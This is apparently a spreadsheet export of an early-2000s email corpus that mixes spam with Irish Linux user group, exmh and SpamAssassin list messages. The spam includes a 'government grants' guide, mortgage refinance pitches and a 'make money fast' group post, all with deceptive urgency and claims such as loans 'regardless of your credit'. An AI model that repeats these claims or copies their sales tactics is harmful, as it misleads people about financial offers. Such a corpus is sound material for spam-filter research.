 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://www.2003marketing.net/grant.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 6662EeWq8-515WKuU5183iwyB0-300LKqX8676juxP8-030cvdb2664Hhl54
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Re: Csh shell scripts
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Thu, 1 Aug 2002 17:35:51 +0100
   | From: Lars Hecking &lt;lhecking@nmrc.ie&gt;
   | 
   | &gt; quickie for shell scripters:
   | &gt; How do I find out the time a file was created at?
   |  
   |  There is no canonical test, and the information is not necessarily
   |  available.  [ ... ]  This information is also shown by ls -lc, but
   |  parsing ls' output requires a bit of effort. I'd rather recommend
   |  [ writing ] a short C program to access the file status directly,
   |  and output the ctime directly (seconds since the epoch, i.e. perfect
   |  |  for numerical comparison).
  some systems have a stat(1) tool --- don't think it's GNU --
  which, when given the `-t' option, does exactly what Lars is
  suggesting:
    $ stat -t /etc/motd
    /etc/motd 21 8 81a4 0 0 303 79 1 0 0 1028070983 830730492 1013296719
  minor problem is the `-t' format is not actually explained in
  the man page, but its fairly easy to work out (or you can just
  look at the source).  also, since the filename is printed as
  the first "field", bizarre filenames (e.g., ones which contain
  spaces or newlines) can confuse a simple script.
 cheers!
 	-blf-
   |  (Another way is to use GNU find -printf with a custom format [ ... ]
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website  http://www.blf.utvinternet.ie
     Stop E$$o (ExxonMobile):  «Whatever you do, don't buy Esso --- they
      don't give a damn about global warming.»    http://www.stopesso.com
      Supported by Greenpeace, Friends of the Earth, and numerous others...
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mortgage Rates Are Down.                                                          8798QQLS4-526VcG-15
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;STYLE&gt;
 BODY {font-family="Arial"}
 TT {font-family="Courier New"}
 BLOCKQUOTE.CITE {margin:0; padding-left:0.5em; border-left:2px solid;}
 SPAN.TABOOHEADER {display=none}
 &lt;/STYLE&gt;
 &lt;title&gt;Online Loan Service&lt;/title&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;p align="left"&gt;
 &lt;FONT FACE=arial,helvetica&gt;&lt;B&gt;&lt;FONT  COLOR="#d6321b" SIZE=5 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;
 What Are You Waiting For?&lt;br&gt;
 &lt;/FONT&gt; &lt;/B&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font size="5" color="#0000FF"&gt;Rates Have Dipped....Approvals Are Up!&lt;/font&gt;&lt;/b&gt;&lt;FONT FACE=arial,helvetica&gt;&lt;B&gt;&lt;font 
 size="5" FAMILY="SANSSERIF" FACE="Arial" LANG="0" color="#0000FF"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;font size="2" color="#FFFFFF"&gt;&lt;b&gt;7&lt;/b&gt;&lt;/font&gt;&lt;span 
 style="background-color: #FFFFFF"&gt;&lt;br&gt;
 Now you can shop for your home loan and get the best deal possible &lt;br&gt;
 through &lt;font color="#000080"&gt;our
 &lt;a href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt; &lt;b&gt;
 Online Home Loan Service&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;a 
 href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt;.&lt;/a&gt; &lt;b&gt;&lt;font color="#D6321B"&gt;&lt;i&gt;Free with 
 no obligation!&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;Act Now! This is the time to take advantage of falling interest 
 rates.&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;Regardless of your 
 credit or income level, money is available for any situation. &lt;br&gt;
 We are working with many lenders who will offer you the best deal possible for
 &lt;br&gt;
 a home loan based on your situation. &lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;Refinance to a lower 
 rate and payment with or without cash in your pocket.&lt;br&gt;
 Second Mortgage or an Equity Line to pay off bills, improve your &lt;br&gt;
 home or just get some cash for what ever purpose you like.&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;We have eliminated the 
 hassle of shopping for a loan. &lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;It's simple an fast!&lt;b&gt;
 &lt;/b&gt;Just complete our &lt;b&gt;
 &lt;a href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt;2 minute form&lt;/a&gt;&lt;/b&gt; which provides the data base&lt;br&gt;
 with the information needed to evaluate your situation and get you a free loan 
 quotation.&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;span style="background-color: #FFFFFF"&gt;We don't pull your 
 credit or ask for your social security number.&lt;i&gt;&lt;b&gt;&lt;font color="#D6321B"&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font color="#D6321B"&gt;It is that easy!&lt;/font&gt;&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font color="#0000FF"&gt;&lt;font color="#000000"&gt;
 &lt;a href="http://www.mort102.com/loanquote/loanquote.html?subject=7MortgageRequest" 
 style="text-decoration: none"&gt;&lt;span style="background-color: #FFFFFF"&gt;
 &lt;font color="#000000"&gt;Just&lt;/font&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;span style="background-color: #FFFFFF"&gt;&lt;a style="text-decoration: none" 
 href="http://www.mort102.com/loanquote/loanquote.html?subject=12EasyQuote"&gt;
 &lt;b&gt;CLICK HERE&lt;font color="#000000"&gt; &lt;/font&gt;&lt;/b&gt;&lt;font color="#000000"&gt;and watch 
 the lenders compete for your business. You are in charge!&lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;
 &lt;FONT FACE=arial,helvetica&gt;&lt;FONT  COLOR="#000080" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;We apologize for any email you may have inadvertently received.
 Please&lt;/FONT&gt;&lt;FONT  COLOR="#000000" style="BACKGROUND-COLOR: #ffffff" SIZE=2 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;
 &lt;a href="http://www.mort102.com/loanquote/remove.html"&gt;CLICK HERE&lt;/a&gt; &lt;/FONT&gt;
 &lt;FONT  COLOR="#000080" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;to opt out from future newsletters&lt;/FONT&gt;&lt;FONT  COLOR="#000000" style="BACKGROUND-COLOR: #ffffff" SIZE=2 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;.&lt;/FONT&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;
 &lt;FONT size="2" FACE="arial,helvetica"&gt;&lt;span style="background-color: #FFFFFF"&gt;&lt;FONT  COLOR="#000000" style="BACKGROUND-COLOR: #ffffff" SIZE=2 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;
 3306SnFA9-534Qdds6061tMjd7-620hqjk9202PsjV2-730TRrJ6475DcBP4-940nOXl63&lt;/FONT&gt;&lt;/span&gt;&lt;/font&gt;&lt;/HTML&gt;&lt;/p&gt;
 &lt;/body&gt;&lt;/html&gt;
 6994YWQc4-053aezr3235JQNT4-931TqbP7290KRAG6-779Wszt1190YChQ5-469XNmg8494hgBl71
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Sun, 22 Sep 2002 22:21:49 -0700
     From:        Brent Welch &lt;welch@panasas.com&gt;
     Message-ID:  &lt;200209230521.BAA11218@blackcomb.panasas.com&gt;
   | I would encourage folks to play with those 10 lines of code in
   | Text_Selection and report what works well for them.  We may come up
   | with 8 lines that work for everyone, or perhaps introduce yet another
   | setting that lets folks choose between a few useful models.  Of course,
   | that's an admission of policy failure, but I'm willing to do that.
 I actually think you're looking in the wrong place.   I, at least,
 have almost no problems with the choice of what gets pasted, or
 selected, that stuff (for me, if perhaps not users of some gnome variant,
 which appraently has been fixed anyway) all seems to work just fine.
 The problem is that a button 1 click clears the selection (PRIMARY)
 where it shouldn't - the previous selection should only be cleared
 when there's something else to replace it (even if the highlighting
 of what is selected is removed).     Try this in any other ramdom
 application (from xterm to netscape) and see how it works.  There
 normally is *no* (mouse based) way to actually clear the primary
 selection (that is, set it to be a null string).
 Then, because of the "if I get asked for the selection value, I will
 find something" behaviour, if you click (intending to set the insert
 point, the way most other GUI's operate), and then paste, because the
 PRIMARY is clear, but exmh still owns the selection, because nothing
 else has taken it, it does and finds some other ramdom stuff, from
 either the clipboard or cut buffer, which tends to be something that was
 deleted back in the ancient past, and pastes that.
 That behaviour, to me anyway, is the real issue.
 Once that gets fixed, we can switch back to operating the normal
 "select stuff, click at new insert point, paste" mode of operation
 that almost everyone expects to work (whether the "select stuff"
 is somewhere in one of the exmh windows, or elsewhere).
 kre
 ps: this message is from my experience as a exmh user only, I've never
 really understood enough about X and selections to go gazing at that
 part of the code and see how it all really operates.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:
 &gt;&gt;&gt;   DATE_IN_PAST_48_96
 &gt;&gt;&gt;   SPAM_PHRASE_00_01
 &gt;&gt;&gt;   SPAM_PHRASE_01_02
 &gt;&gt;&gt;   SPAM_PHRASE_02_03
 &gt;&gt;&gt;   SPAM_PHRASE_03_05
 &gt;&gt;&gt;   SPAM_PHRASE_05_08
 &gt; I was thinking of just removing those particular rules, but keeping the
 &gt; other entries in the range, since they're proving too "noisy" to be
 &gt; effective.  But I'd be willing to keep those ones in, all the same.  What
 &gt; do you think?  Matt/Craig, thoughts?
 I think I could handle commenting out the lowest SPAM_PHRASE_XX_YY
 scores.  If the GA could handle this sort of thing so they'd
 automatically be zeroed, I'd feel better since the ranges could change
 next time the phrase list is regenerated or the algorithm tweaked.
 I think we need to understand why DATE_IN_PAST_48_96 is so low before
 we remove it.  The two rules on either side perform quite well.
 &gt;&gt; And here are the rules that seem like they should be better or should
 &gt;&gt; be recoverable:
 &gt;&gt;&gt;   FROM_MISSING
 &gt;&gt;&gt;   GAPPY_TEXT
 &gt;&gt;&gt;   INVALID_MSGID
 &gt;&gt;&gt;   MIME_NULL_BLOCK
 &gt;&gt;&gt;   SUBJ_MISSING
 &gt; well, I don't like SUBJ_MISSING, I reckon there's a world of mails from
 &gt; cron jobs (e.g.) which hit it.
 Okay, drop SUBJ_MISSING.
 &gt; But, yes, the others for sure should be recoverable, and I'm sure there's
 &gt; more.
 Probably a few, those seemed like the best prospects to me.
 &gt; BTW do you agree with the proposed methodology (ie. remove the rules and
 &gt; bugzilla each one?)
 I only want a bugzilla ticket for each one if people are okay with
 quick WONTFIX closes on the ones deemed unworthy of recovery.
 If you could put the stats for each rule in the ticket somehow (should
 be automatable with email at the very least), it would help.
 Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] serial console question
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Thu, 1 Aug 2002, John P. Looney wrote:
 &gt;  I've found a decrepit raq3 that I'm going to resurrect, as soon as I work
 &gt; out what's up with the console.
 &gt; 
 &gt;  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like:
 Should it be 38K4 - a fairly common baudrate for serial port
 connections? Though if you are getting this much, the baudrate
 may be right. It looks like high ASCII so it may also be worth
 playing with the tty type (ANSI/VT etc).
 &gt;  So it looks like some sort of setting mismatch. Various places on the web
 &gt; say that cobalts are setup with 115200 8n1 serial ports, but someone could
 &gt; have changed it on this particular box.
 Regards...jmcc
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Documentum Acquires E-Room, Melding Content, Collaboration
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Don't know much about eRoom - but there is the magic phrase 'collaborate in
 real-time'... Groove really has people running scared. Wonder if any users
 actually /benefit/ from collaborating in real-time.
 ===
 http://www.internetwk.com/breakingNews/INW20021004S0001
 Content-management vendor Documentum said late Thursday it plans to acquire
 privately held e-Room Technologies in a deal worth about $100 million.
 Documentum will issue approximately 7.7 million shares of its common stock
 and pay about $12.6 million in cash for all of the outstanding shares of
 eRoom.
 Documentum makes a platform for enterprise-wide content management. ERoom
 makes tools for enterprise collaboration. Its customers include Airbus,
 Bausch &amp; Lomb, Ford Motor Co., and Sony.
 Documentum announced plans this summer to deliver a new Collaboration
 Edition of its content-management suite. ERoom was already integrating its
 tools to the Documentum platform, making an acquisition an easy target,
 according to Documentum president and CEO Dave DeWalt.
 With the upcoming joint product, customers will be able to collaborate in
 real-time via virtual workspaces, sharing schedules, resources, and even
 jointly creating content.
 Content creation and management has always been a collaborative task, but
 workflow has usually been delivered via a Web browser interface or even
 simple e-mail -- and rarely in real-time.
 For now, Documentum will sell the eRoom platform and its own
 content-management system through combined sales channels. Further
 integration is planned down the line, the companies said.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEU IM HANDEL! K1-Ausgabe Nr.66
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 12:18:57PM +0100, Kenn Humborg wrote:
 &gt; &gt; mine, and i is happy person once again. In case you were wondering, the
 &gt; &gt; aim of all of this was to write a shell script that could check for new
 &gt; &gt; mail on an imap server.
 &gt; 
 &gt; Doesn't answer your question, but perhaps a combination of expect and
 &gt; (netcat or telnet) might have made for an easier solution?
 Indeed, and that was the fall-back plan if i couldn't figure this out,
 but i knew it had to be possible, and was determined to find a way.
 Steve
 -- 
 "Oh look, it's the Pigeon of Love."
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Optimizing for Pentium Pt.2
</t>
  </si>
  <si>
    <t xml:space="preserve">A while ago I asked what other packages I should optomize for Pentium. One 
 person answered GlibC. This got me thinking about GCC itself, so I asked on 
 another list and got a few answers, most were "don't even think about it" but 
 a few suggested GCC and one pointed me to Linux From Scratch.
 After having a good search around the lfs site, I've decided I'm going to 
 give it a whirl. I've got a spare box and loads of free time, so why not ;-)
 The lfs site, however warns NOT to use optimizations when compiling GCC or 
 GlibC? A quick google found PGCC, a Pentium optimizing patch for GCC, but the 
 site does not seem to have been updated in quite some time?
 So, my general plan, and I'm taking my time with this:
 Partition the hard drive for the lfs set-up with 4 partitions, /, /usr, /var 
 and /home.
 Install a base Debian system into the /home  partition so I can build the 
 rest of the system into the other partitions.
 Using Debian, build the initial packages into the / and /usr partitions. I'll 
 try to optimize GCC and GlibC in this first stage.
 chroot to the / partition and re-build the base packages for shared libs.
 strip de-bugging from the binaries and change the boot so the system boot 
 from / rather than /home, then move /home to it's proper partition.
 All going well, I should now have a full base Linux system running that is 
 fully optimized for my PentiumMMX including GCC and GlibC.
 Now I can build zlib and then X, again optimizing. And I can follow this with 
 the various graphics libs, qt lib and finally KDE.
 If all goes well, I will probably repeate this for my Dual system, once I can 
 find a match for the slot1 550Mhz PIII Iv'e got.
 I might even be tempted to write this up for the site.
 Cheers,
 	John Gay
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 08/08/02 15:26 -0700, Chip Paswater wrote:
 ) &gt; 
 ) &gt; Well, a little more than one bit -- you have to transmit the 
 ) &gt; signature, plus now the entire message body.  Plus your ID.  
 ) &gt; Plus the rights to all intellectual property contained in any 
 ) &gt; email message you submit (I guess technically there are no bits 
 ) &gt; in the rights assignment)
 ) 
 ) Perhaps a feature can be added to razor-report, so that it checks whether a
 ) message is spam before it submits it.  If it is spam, then don't send the
 ) body, 4 signatures, etc, just up the "rating" for that individual spam.
   razor-report only sends the body if the server does not have
   a copy already.  When it does, and the server just notes who also
   thinks that mail is spam, and uses that info in TeS.  
   -chad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</si>
  <si>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--==_Exmh_1643180900P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Wed, 24 Jul 2002 10:23:47 -0500
 &gt;
 &gt; Okay, I've just patched and sourced it into my running exmh, so I'll let you 
 &gt; know if anything breaks.
 oh oh...
 [cwg@deepeddy lib]$ grep 'Ftoc_RescanLine ' *.tcl
 editor.tcl:                         Ftoc_RescanLine $ix dash
 ftoc.tcl:#      Ftoc_RescanLine $ftoc(curLine)
 You missed the call to Ftoc_RescanLine in editor.tcl.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1643180900P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Ps6KK9b4h5R0IUIRAkN7AJ9kW1HE46BxlRu/TmbuiSWWq95pKgCeLhAH
 /u3WggFFeEtCVwV1tLzDN80=
 =K2O3
 -----END PGP SIGNATURE-----
 --==_Exmh_1643180900P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Aug 10, 2002 at 12:00:15AM +0200, Paul Linehan wrote:
 &gt; I suppose it is - however, nobody knows that
 &gt; this message is a response to your one or a 
 &gt; follow-up to my own first message. 
 Get a decent mail client, I can tell what it is 
 extremely easily. 
 &gt; With a newsgroup structure, this is obvious. 
 &gt; 
 &gt; This helps the reader eliminate threads which
 &gt; are irrelevant to them or whatever.
 *looks at mutt*
 -- 
 colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
 Web:                                 http://devnull.redbrick.dcu.ie/ 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: FREE Mortgage Rate Quote - Save THOUSANDS! kplxl
</t>
  </si>
  <si>
    <t xml:space="preserve">Save thousands by refinancing now. Apply from the privacy of your home and receive a FREE no-obligation loan quote.
 http://211.78.96.11/acct/morquote/
 Rates are Down. YOU Win!
 Criteria has relaxed. YOU Win!
 Self-Employed or Poor Credit is OK!
 Get CASH out or money for Home Improvements, Debt Consolidation and more.
 Interest rates are at the lowest point in years-right now! This is the perfect time for you to get a FREE quote and find out how much you can save!
 If those home improvements or high rate credit cards put a dent in your credit, refinance or consolidate your debt now! One easy payment. Customized for your financial situation. Great low rate loans are available for all credit types.
 Get YOUR Free Quote. Fill out the one minute form at:
 http://211.78.96.11/acct/morquote/
 *******************************************
 To unsubscribe, click below:
 http://211.78.96.11/removal/remove.htm
 Allow 72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Oct 06, 2002 at 11:10:05PM +0100, Declan de Lacy Murphy wrote:
 &gt; I am planning to get i-stream solo and share it across a small network
 &gt; (wireless), but I don't want to have to pay eircom for a router and having a
 &gt; noisy pc running constantly isn't really an option because at home
 &gt; inevitably someone will unplug it.
 &gt; 
 &gt; I have been looking at a number of products and although I read the thread
 &gt; about eircom needing pppoe last august I am still not sure if the one that I
 &gt; am interested in will do the job. It is a hawking technology ar 710
 &gt;  http://www.hawkingtech.com/products/ar710.htm ) and if it does the job it
 &gt; will actually be cheaper than the modem eircom is selling.
 &gt; 
 &gt; I would really appreciate if someone could look at the spec on the hawking
 &gt; web page and give me an opinion.
 &gt; 
 &gt; Thanks in advance
 &gt; 
 &gt; Declan
 &gt; 
 I got the DSL-W 906E from http://www.dsl-warehouse.co.uk.
 Though it's not at all the best one around I have to say it does the job
 and a bit. Some of the features can be a pain to get working (ie. pptp in
 pppoe mode - can't figure it out). The documentation is not the best, but
 the guys from http://www.dsl-warehouse.co.uk will help you ouit. They
 also have a message board.
 The command line interface is quite powerful, but absolutely not
 userfriendly.
 All in all it's a cheap desent performer, that I am happy enough with.
 Got this one including a microfilter (not needed) for 140euro including
 shipping. Better than any deal from Eircom.
 -Tor
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TRAMP Update
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000611
 Date: 2002-09-23T23:21:12-06:00
 Finally finished up (most of) TRAMP, my RDF interface for Python. (If you don't 
 use RDF or Python you can probably safely skip this entry.)  
 New in this version: RDF library abstraction (because rdflib's organization 
 currently sucks), write values in addition to reading, and unit tests, all with 
 that old TRAMP flavor you've come to know and love.  
 _But wait,_ it also comes with an entire page of explanation/advertisement[1] 
 if you're not already convinced.
     RDF/XML got you down? Tired of having to go through contortions to deal 
     with data? Want to write Python and be standards-compatible at the same 
     time? Need a module to implement the psuedo-code you had on your slides? *
     TRAMP may or may not be the answer to these problems!*
 Enjoy, and get a free bonus prize if you can tell me[2] why it's called TRAMP.
 [1] http://www.aaronsw.com/2002/tramp
 [2] mailto:me@aaronsw.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make some extra money fast Read how here it is real simple i am totaly serious
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_D20F_01C23B49.FFE05AE0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 We attempted to deliver this message to you with HTML formatting. =
 However, your e-mail program does not support HTML-enhanced messages. =
 Please go to your E-mail Settings for this group and change your E-mail =
 Preference to "Text only".
 http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw
 MSN Groups
 ------=_NextPart_000_D20F_01C23B49.FFE05AE0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
   &lt;HTML&gt;
 &lt;HEAD&gt;
   &lt;META http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=3D#FFFFFF leftmargin=3D"0" rightmargin=3D"0" =
 bottommargin=3D"0" topmargin=3D"0"&gt;&lt;BASEFONT face=3D"Arial, Helvetica, =
 Sans Serif" size=3D2&gt;
 &lt;STYLE type=3Dtext/css&gt;
 /* Foreground colors */
 .ThmFgColumnHeader, A.FrameLink, A.HeaderLink, A.FooterLink, A.LgtCmd, =
 A.MSNLink {color:#FFFFFF;}
 .ThmFgTitleLightBk {color:#FF6600;}
 .ThmFgNavLink, A.NavLink, A.ChildLink:hover {color:#666699;}
 .ThmFgInactiveText, A.SystemLink {color: #666666;}
 .ThmFgFrameTitle {color: #FFFFCC;}
 .ThmFgTitleDarkBk, A.NavLink:hover, A.TitleLink {color: #CC6600;}
 .ThmFgMiscText, A.Cat, A.SubCat {color: #336699;}
 .ThmFgCommand, A.Command, A.LargeCommand, A.MsgLink {color: #003366;}
 .ThmFgHeader {color: #333333;}
 .ThmFgStandard, A.SystemLink:hover, A.SubLink, A.ChildLink, A.StdLink, =
 SELECT.Standard {color: #000000;}
 .ThmFgDivider {color: #CCCCCC;} /* primarily for HR tags */
 /* Background colors */
 .ThmBgStandard {background-color: #FFFFFF;}
 .ThmBgUnknown1 {background-color: #FF6600;}
 .ThmBgFraming {background-color: #666699;}
 .ThmBgUnknown2 {background-color: #666666;}
 .ThmBgHighlightDark {background-color: #FFFFCC;}
 .ThmBgHighlightLight, #idToolbar {background-color: #FFFFE8;}
 .ThmBgTitleDarkBk {background-color: #F1F1F1;}
 .ThmBgAlternate {background-color: #ECF1F6;}
 .ThmBgUnknown3 {background-color: #CCCCFF;}
 .ThmBgDivider {background-color: #CCCCCC;}
 .ThmBgHeader {background-color: #9999CC;}
 .ThmBgLinks {background-color: #8696C9;}
 .ThmBgSharkBar {background-color: #8696C9;}
 &lt;/STYLE&gt;
 &lt;IMG border=3D0 width=3D1 height=3D1 =
 src=3D"http://c.msn.com/c.gif?NC=3D9523&amp;NA=3D34131&amp;PS=3D&amp;PI=3D26283&amp;DI=3D=
 416&amp;TP=3Dhttp://groups.msn.com"&gt;&lt;TABLE border=3D0 cellpadding=3D0 =
 cellspacing=3D0 width=3D"100%" class=3DThmBgAlternate&gt;
   &lt;TR valign=3D"middle"&gt;
     &lt;TD&gt;&lt;IMG align=3D"middle" border=3D"0" =
 src=3D"http://sc.communities.msn.com/themes/pby/img/mail/mlstar.gif"&gt;&lt;/TD=
 &gt;
     &lt;TD width=3D100%&gt;&lt;FONT face=3DArial, Helvetica, Sans Serif =
 class=3DThmFgTitleLightBk size=3D"4"&gt;New Message on &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving"&gt;One Income =
 Living&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD colspan=3D2 width=3D"100%" height=3D"1" =
 colspan=3D"2"&gt;&lt;IMG border=3D"0" =
 src=3D"http://sc.communities.msn.com/img/c.gif" width=3D"100%" =
 height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
       &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Dshowdiscussion&amp;parent=3D1&amp;item=3D1393"&gt;&lt;B&gt;&lt;FONT =
 face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgTitleLightBk =
 size=3D"2"&gt;Make some extra money fast Read how here it is real simple i =
 am totaly serious&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
     &lt;BR&gt;=09
     &lt;TABLE class=3DThmBgAlternate border=3D1 cellspacing=3D0 =
 cellpadding=3D2&gt;
       &lt;TR class=3DThmBgAlternate&gt;&lt;TD align=3Dcenter =
 background=3D"http://sc.communities.msn.com/themes/pby/img/mb/reply_bg.gi=
 f" nowrap&gt;&lt;A =
 href=3D"mailto:OneIncomeLiving@groups.msn.com?subject=3DRe%3A%20Make%20so=
 me%20extra%20money%20fast%20Read%20how%20here%20it%20is%20real%20simple%2=
 0i%20am%20totaly%20serious" title=3D"Send a reply to this =
 message."&gt;&lt;FONT face=3D"Verdana,Arial,Helvetica,Sans Serif" =
 class=3DThmFgCommand size=3D"1"&gt;&lt;B&gt;Reply&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG =
 border=3D0 width=3D80 height=3D1 =
 src=3D"http://sc.communities.msn.com/img/c.gif"&gt;&lt;/TD&gt;&lt;TD width=3D100%&gt;
           &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0&gt;
